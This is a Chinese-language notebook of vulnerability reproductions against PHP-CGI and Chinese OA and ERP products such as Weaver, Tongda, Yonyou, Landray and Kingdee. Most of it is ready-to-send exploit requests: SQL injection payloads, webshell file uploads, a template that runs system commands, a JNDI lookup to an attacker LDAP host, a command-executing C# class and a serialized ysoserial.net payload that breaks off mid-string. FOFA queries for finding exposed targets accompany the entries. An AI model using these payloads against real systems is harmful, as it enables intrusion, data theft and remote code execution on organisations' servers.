漏洞复现

php

php-cgi的远程代码执行漏洞(CVE-2012-1823)

影响版本

5.3.12<php<5.4.2

流量包

1687000658571

url部分为

/?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
#解码
# +号是空格 %3d是=  %3a是：
/?-d allow_url_include=on -d auto_prepend_file=php://input

通过该漏洞来修改WEB服务器的相关配置（本次攻击是为了开启allow_url_include、auto_prepend_file配置），从而使得一些远程执行代码的功能得以实现。

简单来说，这个特殊请求的功能就是使后面的POST数据能以PHP文件格式执行

OA系统

宏景

HR系统 CNVD-2023-08743

fofa语法

body = '<div class="hj-hy-all-one-logo"'

poc

/servlet/codesettree?categories=（Hrms编码之后的sql语句）&codesetid=1&flag=c&parentid=-1&status=1

hrms加解密工具 https://github.com/vaycore/HrmsTool

java -jar hrmsTool.jar -e “1’ union all select ‘hongjing’,@@version–”


GET /servlet/codesettree?categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d&codesetid=1&flag=c&parentid=-1&status=1 HTTP/1.1
Host: xxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

泛微

E-Cology FileDownloadForOutDoc SQL注入

影响版本

Ecology 9.x 补丁版本 < 10.58.0
Ecology 8.x 补丁版本 < 10.58.0

fofa语法

app="泛微-协同办公OA"

poc

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: xxxxxx
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close        

fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1

https://github.com/UltimateSec/ultimaste-nuclei-templates/blob/main/ecology-oa/ecology-oa-filedownloadforoutdoc-sqli.yaml

Weaver E-Office9

影响版本

本地测试环境 v9.0

poc

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 192.168.232.137:8082
User-Agent: test
Connection: close
Content-Length: 493
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
 
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream
 
<?php phpinfo();?>
 
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
 
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--

访问

192.168.232.137:8082/attachment/2133360589/666.php

通达OA

SQL注入（CVE-2023-4165）

影响版本

通达OA ≤ v11.10，v2017

注入路由：general/system/seal_manage/iweboffice/delete_seal.php
注入参数：DELETE_STR

poc

1)%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1

用友

GRP-U8 存在任意文件上传漏洞

语法

app="用友-GRP-U8"

poc

POST http://127.0.0.1/UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=..%2F&filename=94156577.jsp&filename=1.jpg HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: keep-alive
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=59227D2C93FE3E8C2626DA625CE710F9
Content-Type: multipart/form-data
Upgrade-Insecure-Requests: 1
Content-Length: 177

--ec126a48c5b7676dce1b676f5251358f
Content-Disposition: form-data; name="myfile"; filename="test.jpg"

<% out.println("3135168535");%>
--ec126a48c5b7676dce1b676f5251358f--

上传成后webshell地址：http://127.0.0.1/R9iPortal/94156577.jsp

GRP U8 UploadFile 命令执行

POST /UploadFile HTTP/1.1
Host: xxx
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryicNNJvjQHmXpnjFc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryicNNJvjQHmXpnjFc
Content-Disposition: form-data; name="input_localfile"; filename="demodemo.png"
Content-Type: application/octet-stream

<jatools Class="jatools.ReportDocument" Name="jatools report template">
<VariableContext>
</VariableContext>
<Page>
<Name>panel</Name>
<Children ItemClass="PagePanel">
<Item0>
<Name>header</Name>
<Width>753</Width>
<Height>80</Height>
<Children ItemClass="Label">
<Item0>
<ForeColor>-65536</ForeColor>
<X>41</X>
<Y>15</Y>
<Width>362</Width>
<Height>62</Height>
</Item0>
</Children>
<Type>100</Type>
</Item0>
<Item1>
<Name>footer</Name>
<Y>802</Y>
<Width>753</Width>
<Height>280</Height>
<Type>103</Type>
</Item1>
<Item2>
<Name>body</Name>
<Y>80</Y>
<Width>753</Width>
<Height>722</Height>
<Children ItemClass="Table">
<Item0>
<NodePath>学生表</NodePath>
<X>115</X>
<Y>77</Y>
<Children>
<Item0 Class="Label">
<Text>家庭成员</Text>
<Border/>
<PrintStyle>united-level:1;</PrintStyle>
<Cell>
<Row>3</Row>
<Col>0</Col>
<RowSpan>2</RowSpan>
</Cell>
</Item0>
<Item1 Class="Label">
<Text>关系</Text>
<BackColor>-4144897</BackColor>
<Border/>
<Cell>
<Row>3</Row>
<Col>1</Col>
</Cell>
</Item1>
<Item2 Class="Label">
<Text>性别</Text>
<BackColor>-4144897</BackColor>
<Border/>
<Cell>
<Row>3</Row>
<Col>2</Col>
</Cell>
</Item2>
<Item3 Class="Label">
<Text>年龄</Text>
<BackColor>-4144897</BackColor>
<Border/>
<Cell>
<Row>3</Row>
<Col>3</Col>
</Cell>
</Item3>
<Item4 Class="Label">
<Text>得分</Text>
<Border/>
<Cell>
<Row>2</Row>
<Col>0</Col>
</Cell>
</Item4>
<Item5 Class="Label">
<Text>性别</Text>
<Border/>
<Cell>
<Row>1</Row>
<Col>0</Col>
</Cell>
</Item5>
<Item6 Class="Label">
<Text>姓名</Text>
<Border/>
<Cell>
<Row>0</Row>
<Col>0</Col>
</Cell>
</Item6>
<Item7 Class="Text">
<Variable>=$学生表</Variable>
<Border/>
<Cell>
<Row>0</Row>
<Col>1</Col>
<ColSpan>3</ColSpan>
</Cell>
</Item7>
<Item8 Class="Text">
<Variable>=$学生表.value()</Variable>
<Border/>
<Cell>
<Row>1</Row>
<Col>1</Col>
<ColSpan>3</ColSpan>
</Cell>
</Item8>
<Item9 Class="Text">
<Variable>=$学生表.getName()</Variable>
<Border/>
<Cell>
<Row>2</Row>
<Col>1</Col>
<ColSpan>3</ColSpan>
</Cell>
</Item9>
<Item10 Class="RowPanel">
<Cell>
<Row>4</Row>
<Col>0</Col>
<ColSpan>4</ColSpan>
</Cell>
<Children ItemClass="Text">
<Item0>
<Variable></Variable>
<Border/>
<Cell>
<Row>4</Row>
<Col>3</Col>
</Cell>
</Item0>
<Item1>
<Variable></Variable>
<Border/>
<Cell>
<Row>4</Row>
<Col>2</Col>
</Cell>
</Item1>
<Item2>
<Variable>;</Variable>
<Border/>
<Cell>
<Row>4</Row>
<Col>1</Col>
</Cell>
</Item2>
</Children>
<NodePath>成员</NodePath>
</Item10>
</Children>
<ColumnWidths>60,60,60,60</ColumnWidths>
<RowHeights>20,20,20,20,20</RowHeights>
</Item0>
</Children>
<Type>102</Type>
</Item2>
</Children>
</Page>
<NodeSource>
<Children ItemClass="ArrayNodeSource">
<Item0>
<Children ItemClass="ArrayNodeSource">
<Item0>
<TagName>成员</TagName>
<Expression>$.value()</Expression>
</Item0>
</Children>
<TagName>学生表</TagName>
<Expression>new Object[]{new BufferedReader(new InputStreamReader(java.lang.Runtime.getRuntime().exec("whoami").getInputStream())).readLine()}</Expression>
</Item0>
</Children>
</NodeSource>
</jatools>
------WebKitFormBoundaryicNNJvjQHmXpnjFc
Content-Disposition: form-data; name="type"

1
------WebKitFormBoundaryicNNJvjQHmXpnjFc--

访问/u8qx/tools/defaultviewer.jsp?file=../../upload/demodemo.png HTTP/1.1

移动管理系统 uploadApk.do 任意文件上传漏洞

网络测绘

app="用友-移动系统管理"

poc

POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.server
Connection: close

------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"
Content-Type: application/msword

hello
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--

/maupload/apk/a.jsp

NC Cloud jsinvoke 任意文件上传漏洞

网络测绘

app="用友-NC-Cloud"

poc

POST /uapjs/jsinvoke/?action=invoke
Content-Type: application/json

{
    "serviceName":"nc.itf.iufo.IBaseSPService",
    "methodName":"saveXStreamConfig",
    "parameterTypes":[
        "java.lang.Object",
        "java.lang.String"
    ], 
    "parameters":[
        "${param.getClass().forName(param.error).newInstance().eval(param.cmd)}",
        "webapps/nc_web/407.jsp"
    ]
}


POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: 
Connection: Keep-Alive
Content-Length: 253
Content-Type: application/x-www-form-urlencoded


{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}","webapps/nc_web/301.jsp"]}

/cmdtest.jsp?error=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec(%22whoami%22).getInputStream())

GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞

POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
Host: 
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20
Content-Type: application/x-www-form-urlencoded

userName=%27;WAITFOR%20DELAY%20%270:0:10%27--&class.module.classLoader.DefaultAssertionStatus=

Landray 蓝凌

EIS智慧协同平台文件上传

FOFA

body=”欢迎登录智慧协同平台”

nuclei

nuclei 验证

id: landray-eis-saveImg-upload

info:
  name: landray-eis-saveImg-upload
  author: landray-eis-saveImg-upload

variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{rand_base(16)}}"

http:
  - raw:
      - |
        POST /eis/service/api.aspx?action=saveImg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
        Accept-Encoding: gzip, deflate
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Connection: close
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Upgrade-Insecure-Requests: 1
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{boundary}}
        Content-Length: 208
        
        ------WebKitFormBoundary{{boundary}}
        Content-Disposition: form-data; name="file"filename="{{filename}}.asp"
        Content-Type: text/html
        
        <% response.write("hello world")%>
        ------WebKitFormBoundary{{boundary}}--

      - |
        GET /files/editor_img/{{aspfilenammme}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
    

    extractors:
      - type: regex
        part: body
        name: aspfilenammme
        group: 1
        internal: true
        regex:
          - '/files/editor_img/([0-9-a-z]+/\w+\.asp)' 

        

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200 && contains(body_1,"editor_img") && contains(body_2,"hello world")'

万户协同办公平台未授权访问漏洞

漏洞详情

万户ezOFFICE协同管理平台涵盖门户自定义平台、信息知识平台管理、系统管理平台功能，它以工作流引擎为底层服务，以通讯沟通平台为交流手段，以门户自定义平台为信息推送显示平台，为用户提供集成的协同工作环境。该平台存在未授权访问漏洞，攻击者可以从evoInterfaceServlet接口获得系统登录账号和用MD5加密的密码。

版本

version <=12.4.12.25

语法

app.name="万户 Ezoffice OA"

poc

GET /defaultroot/evoInterfaceServlet?paramType=user HTTP/1.1
Host:

补丁

http://www.whir.net/CustomerService/index.html

金蝶云星空RCE漏洞

https://blog.csdn.net/qq_41904294/article/details/131332436?spm=1001.2014.3001.5502

漏洞描述

由于金蝶云星空数据通信默认采用的是二进制数据格式，需要进行序列化与反序列化，在此过程中未对数据进行签名或校验，导致客户端发出的数据可被攻击者恶意篡改，写入包含恶意代码的序列化数据，达到在服务端远程命令执行的效果。该漏洞不仅存在于金蝶云星空管理中心（默认8000端口），普通应用（默认80端口）也存在类似问题。

影响范围

6.x版本：低于6.2.1012.4

7.x版本：7.0.352.16 至 7.7.0.202111

8.x版本：8.0.0.202205 至 8.1.0.20221110

fofa语法

app="金蝶云星空-管理中心"

poc

POST /Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1
Host: your-ip
Content-Type: text/json
 
{"ap0":"asdas","format":"3"}

使用 ysoserial.net工具构造Payload

.\ysoserial.exe -f BinaryFormatter -g ActivitySurrogateSelectorFromFile -c "a.cs;System.Windows.Forms.dll;System.Web.dll;System.dll"

命令中 -f 指定的是.net程序中的序列化类，-g 是ysoserial.net工具中的攻击链，这里指定的是ActivitySurrogateSelectorFromFile链，这个攻击链可加载自定义的程序集。-c 是构造的程序集（a.cs），后面的dll文件是.NET Framework中的一个核心DLL文件，包含了一些相关的类和方法(自行加载，不需要构造)

编写一个从请求头中获取参数执行命令的ASP.NET 程序

class E
{
    public E()
    {
        System.Web.HttpContext context = System.Web.HttpContext.Current;
        context.Server.ClearError();
        context.Response.Clear();
        try
        {
            System.Diagnostics.Process process = new System.Diagnostics.Process();
            process.StartInfo.FileName = "cmd.exe";
            string cmd = context.Request.Headers["cmd"];
            process.StartInfo.Arguments = "/c " + cmd;
            process.StartInfo.RedirectStandardOutput = true;
            process.StartInfo.RedirectStandardError = true;
            process.StartInfo.UseShellExecute = false;
            process.Start();
            string output = process.StandardOutput.ReadToEnd();
            context.Response.Write(output);
        } catch (System.Exception) {}
        context.Response.Flush();
        context.Response.End();
    }
}

PS：通过接收 HTTP请求中的 cmd 参数，将其作为命令行参数传递给 cmd.exe 进程，并获取其输出结果，最终将输出结果作为 HTTP 响应返回给客户端（需放到ysoserial.net工具目录下或指定绝对路径）

生成序列化数据，加载到PoC中

最终exp

POST /Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1
Host: your-ip
Content-Type: text/json
cmd: dir
 
{"ap0":"AAEAAAD/AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMctAAACAAEAAAD/AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNvbGxlY3Rp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